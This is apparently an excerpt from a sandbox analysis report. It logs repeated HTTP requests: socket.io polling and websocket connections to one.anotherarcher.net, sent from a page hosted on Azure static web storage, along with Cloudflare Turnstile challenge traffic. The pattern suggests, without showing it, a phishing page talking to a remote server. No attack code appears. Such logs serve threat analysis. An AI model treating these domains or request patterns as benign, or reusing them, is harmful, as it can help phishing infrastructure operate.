Source: global trafficHTTP traffic detected: GET /socket.io/?EIO=4&transport=polling&t=P9KB3bm&sid=V0SbaC7hwW_9JHUoAANU HTTP/1.1Host: one.anotherarcher.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /socket.io/?EIO=4&transport=polling&t=P9KB47a HTTP/1.1Host: one.anotherarcher.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Accept: */*sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Origin: https://q0ednre2adn0en00.z1.web.core.windows.netSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://q0ednre2adn0en00.z1.web.core.windows.net/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/g/orchestrate/chl_api/v1?ray=8ccfd805a9cd425d&lang=auto HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/g/flow/ov1/136349667:1727987345:YIwZHJwwHqPIcBZYWS-e5MClYzwtIJxGEVjRi2T8QKc/8ccfd7ea7f73238a/742272a500bdc81 HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /socket.io/?EIO=4&transport=websocket&sid=upBLX-IH5e62neF1AANX HTTP/1.1Host: one.anotherarcher.netConnection: UpgradePragma: no-cacheCache-Control: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Upgrade: websocketOrigin: https://q0ednre2adn0en00.z1.web.core.windows.netSec-WebSocket-Version: 13Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Sec-WebSocket-Key: UiFaPdmwgSx0alLQ4od71Q==Sec-WebSocket-Extensions: permessage-deflate; client_max_window_bits
Source: global trafficHTTP traffic detected: GET /socket.io/?EIO=4&transport=polling&t=P9KB4i2&sid=upBLX-IH5e62neF1AANX HTTP/1.1Host: one.anotherarcher.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Accept: */*sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Origin: https://q0ednre2adn0en00.z1.web.core.windows.netSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://q0ednre2adn0en00.z1.web.core.windows.net/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/g/turnstile/if/ov2/av0/rcv0/0/jrwmv/0x4AAAAAAAXfz5cXCad3M5bH/auto/fbE/normal/auto/ HTTP/1.1Host: challenges.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: cross-siteSec-Fetch-Mode: navigateSec-Fetch-Dest: iframeReferer: https://q0ednre2adn0en00.z1.web.core.windows.net/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/g/flow/ov1/1438625525:1727987399:Ijto8JMFouAGt8YggseLV21TksqB395OrQnr3PCkYFY/8ccfd805a9cd425d/242f3f86f527414 HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /socket.io/?EIO=4&transport=polling&t=P9KB47a HTTP/1.1Host: one.anotherarcher.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /socket.io/?EIO=4&transport=polling&t=P9KB4i0&sid=upBLX-IH5e62neF1AANX HTTP/1.1Host: one.anotherarcher.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/g/orchestrate/chl_api/v1?ray=8ccfd82849af42f2&lang=auto HTTP/1.1Host: challenges.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/turnstile/if/ov2/av0/rcv0/0/jrwmv/0x4AAAAAAAXfz5cXCad3M5bH/auto/fbE/normal/auto/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /socket.io/?EIO=4&transport=polling&t=P9KB53T&sid=upBLX-IH5e62neF1AANX HTTP/1.1Host: one.anotherarcher.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Accept: */*sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Origin: https://q0ednre2adn0en00.z1.web.core.windows.netSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://q0ednre2adn0en00.z1.web.core.windows.net/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /socket.io/?EIO=4&transport=polling&t=P9KB4i2&sid=upBLX-IH5e62neF1AANX HTTP/1.1Host: one.anotherarcher.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/g/i/8ccfd805a9cd425d/1727989041725/ojbtsX4PF9lVuS1 HTTP/1.1Host: challenges.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/turnstile/if/ov2/av0/rcv0/0/7i029/0x4AAAAAAAXfz5cXCad3M5bH/auto/fbE/normal/auto/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/g/pat/8ccfd805a9cd425d/1727989041729/d299e5ec70374f3262372de51a6ce27e4074b20ef686f9f41b3ad0b3a165e40b/fRk6UL54bhzdyrZ HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveCache-Control: max-age=0sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/turnstile/if/ov2/av0/rcv0/0/7i029/0x4AAAAAAAXfz5cXCad3M5bH/auto/fbE/normal/auto/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/g/orchestrate/chl_api/v1?ray=8ccfd82849af42f2&lang=auto HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /socket.io/?EIO=4&transport=polling&t=P9KB5en HTTP/1.1Host: one.anotherarcher.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Accept: */*sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Origin: https://q0ednre2adn0en00.z1.web.core.windows.netSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://q0ednre2adn0en00.z1.web.core.windows.net/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/g/i/8ccfd805a9cd425d/1727989041725/ojbtsX4PF9lVuS1 HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /socket.io/?EIO=4&transport=websocket&sid=HxCTxStOpXjLKRD_AANa HTTP/1.1Host: one.anotherarcher.netConnection: UpgradePragma: no-cacheCache-Control: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Upgrade: websocketOrigin: https://q0ednre2adn0en00.z1.web.core.windows.netSec-WebSocket-Version: 13Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Sec-WebSocket-Key: fXipWpq3O23ZPKIQP+lurw==Sec-WebSocket-Extensions: permessage-deflate; client_max_window_bits
Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/g/i/8ccfd82849af42f2/1727989047469/vzp1BJPgElHZJvF HTTP/1.1Host: challenges.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/turnstile/if/ov2/av0/rcv0/0/jrwmv/0x4AAAAAAAXfz5cXCad3M5bH/auto/fbE/normal/auto/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/g/flow/ov1/223406031:1727987438:Xv_Al2IpeM4HkywcXvVtjay6EDDaGmub-i6LKQI9Wig/8ccfd82849af42f2/57d4757eac0388b HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /socket.io/?EIO=4&transport=polling&t=P9KB65a&sid=HxCTxStOpXjLKRD_AANa HTTP/1.1Host: one.anotherarcher.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Accept: */*sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Origin: https://q0ednre2adn0en00.z1.web.core.windows.netSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://q0ednre2adn0en00.z1.web.core.windows.net/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /socket.io/?EIO=4&transport=polling&t=P9KB5en HTTP/1.1Host: one.anotherarcher.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/g/flow/ov1/1438625525:1727987399:Ijto8JMFouAGt8YggseLV21TksqB395OrQnr3PCkYFY/8ccfd805a9cd425d/242f3f86f527414 HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/g/i/8ccfd82849af42f2/1727989047469/vzp1BJPgElHZJvF HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /socket.io/?EIO=4&transport=polling&t=P9KB65Z&sid=HxCTxStOpXjLKRD_AANa HTTP/1.1Host: one.anotherarcher.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/g/turnstile/if/ov2/av0/rcv0/0/86ghn/0x4AAAAAAAXfz5cXCad3M5bH/auto/fbE/normal/auto/ HTTP/1.1Host: challenges.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: cross-siteSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: iframeReferer: https://q0ednre2adn0en00.z1.web.core.windows.net/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /socket.io/?EIO=4&transport=polling&t=P9KB6NS&sid=HxCTxStOpXjLKRD_AANa HTTP/1.1Host: one.anotherarcher.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Accept: */*sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Origin: https://q0ednre2adn0en00.z1.web.core.windows.netSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://q0ednre2adn0en00.z1.web.core.windows.net/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /socket.io/?EIO=4&transport=polling&t=P9KB65a&sid=HxCTxStOpXjLKRD_AANa HTTP/1.1Host: one.anotherarcher.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/g/pat/8ccfd82849af42f2/1727989047472/e53e8c3f2f8c351e0d6de244f7bc9e0685c7312f320e241f08ded9bfaa7d5646/ub8_AuRp71dkuv3 HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveCache-Control: max-age=0sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/turnstile/if/ov2/av0/rcv0/0/jrwmv/0x4AAAAAAAXfz5cXCad3M5bH/auto/fbE/normal/auto/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/g/orchestrate/chl_api/v1?ray=8ccfd84d0859428f&lang=auto HTTP/1.1Host: challenges.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/turnstile/if/ov2/av0/rcv0/0/86ghn/0x4AAAAAAAXfz5cXCad3M5bH/auto/fbE/normal/auto/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/g/orchestrate/chl_api/v1?ray=8ccfd84d0859428f&lang=auto HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/g/flow/ov1/223406031:1727987438:Xv_Al2IpeM4HkywcXvVtjay6EDDaGmub-i6LKQI9Wig/8ccfd82849af42f2/57d4757eac0388b HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /socket.io/?EIO=4&transport=polling&t=P9KB6_F HTTP/1.1Host: one.anotherarcher.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Accept: */*sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Origin: https://q0ednre2adn0en00.z1.web.core.windows.netSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://q0ednre2adn0en00.z1.web.core.windows.net/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /socket.io/?EIO=4&transport=polling&t=P9KB6_F HTTP/1.1Host: one.anotherarcher.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /socket.io/?EIO=4&transport=websocket&sid=nfBwI2C7WkmjiD5NAANd HTTP/1.1Host: one.anotherarcher.netConnection: UpgradePragma: no-cacheCache-Control: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Upgrade: websocketOrigin: https://q0ednre2adn0en00.z1.web.core.windows.netSec-WebSocket-Version: 13Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Sec-WebSocket-Key: MRLh/sgXupb+i3mMS/vyVw==Sec-WebSocket-Extensions: permessage-deflate; client_max_window_bits
Source: global trafficHTTP traffic detected: GET /socket.io/?EIO=4&transport=polling&t=P9KB7N0&sid=nfBwI2C7WkmjiD5NAANd HTTP/1.1Host: one.anotherarcher.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Accept: */*sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Origin: https://q0ednre2adn0en00.z1.web.core.windows.netSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://q0ednre2adn0en00.z1.web.core.windows.net/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/g/turnstile/if/ov2/av0/rcv0/0/n0t9y/0x4AAAAAAAXfz5cXCad3M5bH/auto/fbE/normal/auto/ HTTP/1.1Host: challenges.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: cross-siteSec-Fetch-Mode: navigateSec-Fetch-Dest: iframeReferer: https://q0ednre2adn0en00.z1.web.core.windows.net/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /socket.io/?EIO=4&transport=polling&t=P9KB7eU&sid=nfBwI2C7WkmjiD5NAANd HTTP/1.1Host: one.anotherarcher.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Accept: */*sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Origin: https://q0ednre2adn0en00.z1.web.core.windows.netSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://q0ednre2adn0en00.z1.web.core.windows.net/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/g/orchestrate/chl_api/v1?ray=8ccfd86f5fc70ca2&lang=auto HTTP/1.1Host: challenges.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/turnstile/if/ov2/av0/rcv0/0/n0t9y/0x4AAAAAAAXfz5cXCad3M5bH/auto/fbE/normal/auto/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/g/flow/ov1/520840529:1727987471:dZM8UV-JAT2hGcuf3zG_cR0GPG48srOyHscTUzuMey8/8ccfd84d0859428f/2b545705cb2f7d9 HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /socket.io/?EIO=4&transport=polling&t=P9KB7M_&sid=nfBwI2C7WkmjiD5NAANd HTTP/1.1Host: one.anotherarcher.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
